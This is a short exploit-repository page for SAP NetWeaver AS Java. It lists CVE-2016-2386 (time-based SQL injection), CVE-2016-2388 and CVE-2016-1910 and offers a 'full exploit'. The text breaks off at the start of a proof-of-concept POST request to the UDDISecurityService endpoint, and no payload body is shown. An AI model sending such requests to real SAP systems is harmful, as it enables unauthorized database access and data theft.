The User Management Engine (UME) in SAP NetWeaver 7.4 allows malicious users to decrypt unspecified data via unknown vectors, aka SAP Security Note 2191290.
Here you can get full exploit for SAP NetWeaver AS JAVA
SAP_exploit
Author: Vahagn Vardanyan twittercom/vah_13
Bugs:
CVE-2016-2386 SQL injection
CVE-2016-2388 Information disclosure
CVE-2016-1910 Crypto issue
Follow HTTP request is a simple PoC for anon time-based SQL injection (CVE-2016-2386) vulnerability in SAP NetWeaver AS Java UDDI 711-750
POST /UDDISecurityService/UDDISecurityImplBean HTTP/11
User-Agent: